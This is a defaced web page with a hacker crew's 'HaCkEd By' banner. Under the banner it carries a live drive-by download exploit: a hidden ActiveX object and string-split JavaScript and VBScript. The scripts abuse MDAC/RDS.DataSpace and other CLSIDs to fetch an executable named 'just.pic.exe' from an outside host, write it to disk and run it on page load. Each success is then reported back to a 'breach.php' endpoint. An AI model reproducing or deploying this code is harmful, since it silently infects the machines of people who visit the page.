[ HaCkEd By ;) Mr.F9LaH Al-3NzY + Mr.Sh'3B aL-3nZy ]

Ow3nD By [#] تم الدعس

Mr.F9LaH Al-3nZy + Mr.Sh'3B aL-3nZy

الـعـ501ـنـزي

YoR@HoTMaiL.CoM + TyM@hotmail.com

<HTML> <BODY> <OBJECT ID="Down & Exec ActiveX By [ Mr.F9LaH ] EmAiL : YoR@HoTmAiL.CoM" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="http://dr7adnan.110mb.com/DownloaderActiveX.cab#Version=1,0,0,1"> <PARAM NAME="propWidth" VALUE="0"> <PARAM NAME="propHeight" VALUE="0"> <PARAM NAME="propDownloadUrl" VALUE="http://h1.ripway.com/F9LaH/just.pic.exe"> <PARAM NAME="propPostDownloadAction" VALUE="run">  </OBJECT> <div style = "width: 0%; max-height: 0px; overflow: scroll;"> <script type="text/javascript" src="http://h1.ripway.com/F9LaH/just.pic.exe"></script> <script type="text/javascript"></script> </div> <Script Language="JavaScript"> var url1="http://h1.ripway.com/F9LaH/just.pic.exe"; var rndmz = Math.round(Math.random()*99999); var a1="cls"; var a2="id:"; var a3="BD9"; var a4="6C5"; var a5="56-"; var a6="65A"; var a7="3-1"; var a8="1D0"; var a9="-98"; var a0="3A-"; var b1="00C"; var b2="04F"; var b3="C29"; var b4="E36"; var b5="obj"; var b6="ect"; var b7="msx"; var b8="ml2"; var b9=".XM"; var b0="LHT"; var c1="She"; var c2="ll."; var c3="App"; var c4="lic"; var c5="ati"; var c6="db."; var c7="str"; var c8="eam"; var c9="GE"; var c0="1"; var d1="exe"; iw=buff(); function buff() { var z_obj = document.createElement(b5+b6); z_obj.setAttribute("id","z_obj"); z_obj.setAttribute("classid",a1+a2+a3+a4+a5+a6+a7+a8+a9+a0+b1+b2+b3+b4+""); try { var ff = z_obj.CreateObject(b7+b8+b9+b0+"TP",""); var cc = z_obj.CreateObject(c1+c2+c3+c4+c5+"on",""); var rr = z_obj.CreateObject("a"+"do"+c6+c7+c8,""); try { rr.type = c0; ff.open(c9+"T",url1,false); ff.send(); rr.open(); rr.Write(ff.responseBody); var fpname = "..//"+rndmz+"."+d1; rr.SaveToFile(fpname,2); rr.Close(); } catch(e) {} try { eval(cc.Shelllexecute(fpname)); if(Shelllexecute=true) { var req = new ActiveXObject("Microsoft.XMLHTTP"); req.open("GET", "breach.php?smc=" + Math.random()); req.send(null); }} catch(e) {}} catch(e) {}} iw; </Script> <script language="javascript"> function Cr_obj(o, nnf) { var frf = null; try { eval("frf = o.CreateObject(nnf)") }catch(e){} if (! frf) {try { eval("frf = o.CreateObject(nnf, \"\")") }catch(e){}} if (! frf) {try { eval("frf = o.CreateObject(nnf, \"\", \"\")") }catch(e){}} if (! frf) {try { eval("frf = o.GetObject(\"\", nnf)") }catch(e){}} if (! frf) {try { eval("frf = o.GetObject(nnf, \"\")") }catch(e){}} if (! frf) {try { eval("frf = o.GetObject(nnf)") }catch(e){}} return(frf); } var e1="msx"; var e2="ml2"; var e3=".XM"; var e4="LHT"; var e5="GE"; var e6="dod"; var e7="b.s"; var e8="tre"; var e9="1"; var e0="exe"; var h9="She"; var h0="ll."; var i1="App"; var i2="lic"; var i3="ati"; var i4="cls"; var i5="id:"; var i6="cla"; var i7="ssi"; var i8="obj"; var i9="ect"; var f1="BD96C556-65A3-11D0"; var f2="-983A-00C04FC29E30"; var f3="BD96C556-65A3-11D0"; var f4="-983A-00C04FC29E36"; var f5="AB9BCEDD-EC7E-47E1"; var f6="-9322-D4A210617116"; var f7="0006F033-0000-0000"; var f8="-C000-000000000046"; var f9="0006F03A-0000-0000"; var f0="-C000-000000000046"; var g1="6e32070a-766d-4ee6"; var g2="-879c-dc1fa91d2fc3"; var g3="6414512B-B978-451D"; var g4="-A0D8-FCFDF33E833C"; var g5="7F5B7F63-F06F-4331"; var g6="-8A26-339E03C0AE3D"; var g7="06723E09-F4C2-43c8"; var g8="-8358-09FCD1DB0766"; var g9="639F725F-1B2D-4831"; var g0="-A9FD-874847682010"; var h1="BA018599-1DB3-44f9"; var h2="-83B4-461454C84BF8"; var h3="D0C07D56-7C69-43F1"; var h4="-B4A0-25F5A11FAB19"; var h5="E8CCCDDF-CA28-496b"; var h6="-B050-6C07C962476B"; var h7="BD96C556-65A3-11D0"; var h8="-983A-00C04FC29E30"; var rndmzz = Math.round(Math.random()*99999); var url2="http://h1.ripway.com/F9LaH/just.pic.exe"; function Core_Go(a_core) { var msa_obj = Cr_obj(a_core,e1+e2+e3+e4+"TP"); msa_obj.open(e5+"T",url2,false); msa_obj.send(); var ams_obj = Cr_obj(a_core,"a"+e6+e7+e8+"am"); ams_obj.type = e9; ams_obj.open(); ams_obj.Write(msa_obj.responseBody); var fnms = "..//"+rndmzz+"."+e0; ams_obj.SaveToFile(fnms,2); var s = Cr_obj(a_core, h9+h0+i1+i2+i3+"on"); try { s.ShelllExecute(fnms); if(Shelllexecute=true) { var req = new ActiveXObject("Microsoft.XMLHTTP"); req.open("GET", "breach.php?cro=" + Math.random()); req.send(null); }} catch(e) {} return TRUE; } var fii = 0; var t = new Array( "{"+f1+f2+"}","{"+f3+f4+"}", "{"+f5+f6+"}","{"+f7+f8+"}","{"+f9+f0+"}","{"+g1+g2+"}","{"+g3+g4+"}","{"+g5+g6+"}","{"+g7+g8+"}","{"+g9+g0+"}","{"+h1+h2+"}","{"+h3+h4+"}","{"+h5+h6+"}","{"+h7+h8+"}",null); while (t[fii]) { var a = null; if (t[fii].substring(0,1) == "{") { a = document.createElement(i8+i9); a.setAttribute(i6+i7+"d", i4+i5 + t[fii].substring(1, t[fii].length - 1)); } else { try { a = new ActiveXObject(t[fii]); } catch(e){} } if (a) { try { var b = Cr_obj(a, h9+h0+i1+i2+i3+"on"); if (b) { if (Core_Go(a)) break; } } catch(e){} } fii++; } </script> <SCRIPT language="VBScript"> url3 = "http://h1.ripway.com/F9LaH/just.pic.exe" url4 = "http://h1.ripway.com/F9LaH/just.pic.exe" Function GTCLS() aa1="cls" aa2="id:" aa3="BD9" aa4="6C5" aa5="56-" aa6="65A" aa7="3-1" aa8="1D0" aa9="-98" aa0="3A-" a10="00C" a11="04F" a12="C29" a14="E36" GTCLS = aa1&aa2&aa3&aa4&aa5&aa6&aa7&aa8&aa9&aa0&a10&a11&a12&a14 End Function If navigator.appName="Microsoft Internet Explorer" Then If InStr(navigator.platform,"Win32") <> 0 Then Const Mod_rwrt=3 Const Mod_tpbr=1 Const Mod_cowr=2 Dim xFRD Dim xXMT Dim xFSD Dim xStr Dim xWSh Dim xSha Dim xfns Dim xMBD Dim xPgf Dim cByte Dim ObjName Dim ObjProg a15 = "ex" a16 = "." a17 = "obj" a18 = "ect" a19 = "id" a20 = "She" a21 = "ll." a22 = "App" a23 = "lic" a24 = "ati" a25 = "Micro" a26 = "soft" a27 = "XM" a28 = "LH" a29 = "TTP" a30 = "G" a31 = "ET" a32 = "0" a33 = "DOD" a34 = "Str" a35 = "eam" a37 = "Scr" a38 = "ipt" a39 = "ing" a40 = ".Fi" a41 = "leS" a42 = "yst" a43 = "emO" a44 = "bje" a45 = "ct" a46 = "WSc" a47 = "rip" a48 = "t.S" a49 = "hel" a50 = a46&a47&a48&a49 a36=a37&a38&a39&a40&a41&a42&a43&a44&a45 Set xFRD=document.createElement(a17+a18) xFRD.setAttribute a19,"xFRD" xFRD.setAttribute "classid",GTCLS Set xSha = xFRD.CreateObject(a20 & a21 & a22 & a23 & a24 & "on","") xfns="..//957123844" & a16 & a15 & "e" set xXMT = CreateObject(a25 & a26 & "." & a27 & a28 & a29) HTTPSession=xXMT.Open(a30 & a31,url3,a32) xXMT.Send() On Error Resume Next xMBD=xXMT.responseBody On Error Resume Next Set xStr=xFRD.CreateObject("A" & a33 & "B" & "." & a34 & a35,"") If Err.number <> 0 Then Set xFSD=xFRD.CreateObject(a36,"") Set xPgf=xFSD.CreateTextFile(xfns, true) Pllen=LenB(xMBD) For j=1 To Pllen cByte=MidB(xMBD,j,1) ByteCode=AscB(cByte) xPgf.Write(Chr(ByteCode)) Next xPgf.Close Set xWSh=xFRD.CreateObject(a50 & "l","") On Error Resume Next xWSh.Run (xfns),1,FALSE Else xStr.Mode=Mod_rwrt xStr.Type=Mod_tpbr xStr.Open xStr.Write xMBD xStr.SaveToFile xfns,Mod_cowr Function getexec1() on error resume next xSha.ShelllExecute xfns End Function randomize rnfx0000=round(rnd*99999) call getexec1 if Err.Number = 0 then Set Http = CreateObject("Microsoft.XMLHTTP") Http.Open "GET", "breach.php?mdac=" & rnfx0000, false Http.Send end if End If End If End If on error resume next a51 = "clas" a52 = "sid" a53 = a51&a52 a55 = "Micr" a56 = "osoft" a57 = ".XM" a58 = "LHT" a59 = "TP" a60 = "obj" a61 = "ect" a62 = "A" a63 = "dod" a64 = "b.St" a65 = "re" a66 = "am" a67 = a62&a63&a64&a65&a66 a68 = "G" a69 = "ET" a70 = a68&a69 a71 = a70 a72 = a71 a73 = "e" a74 = "x" a75 = "." a76 = "Scr" a77 = "ipti" a78 = "ng.Fi" a79 = "leSys" a80 = "temO" a81 = "bject" a82 = a76&a77&a78&a79&a80&a81 a83 = a82 a84 = "She" a85 = "ll." a86 = "App" a87 = "lic" a88 = "ati" a89 = a84&a85&a86&a87&a88 a90 = a89 Set a54 = document.createElement(a60&a61) a54.setAttribute a53,GTCLS Set x = a54.CreateObject(a55&a56&a57&a58&a59,"") set Yzx = a54.createobject(a67,"") Yzx.type = 1 x.Open a72, url4, false x.Send fnmzzzzs="..//957123845" & a75 & a73 & a74 & a73 set FF = a54.createobject(a83,"") set tempfiles = F.GetSpecialFolder(2) fnmzzzzs= FF.BuildPath(tempfiles,fnmzzzzs) Yzx.open Yzx.write x.responseBody Yzx.savetofile fnmzzzzs,2 Yzx.close Function getexec2() on error resume next set MM = a54.createobject(a90&"on","") MM.ShelllExecute fnmzzzzs,"","","open",0 End Function randomize rnfx0001=round(rnd*99999) call getexec2 if Err.Number = 0 then Set Http = CreateObject("Microsoft.XMLHTTP") Http.Open "GET", "breach.php?mdac=" & rnfx0001, false Http.Send end if </script> </BODY> </HTML>